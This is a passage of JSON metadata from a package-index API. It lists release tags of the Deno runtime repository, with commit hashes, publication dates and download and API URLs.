v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosy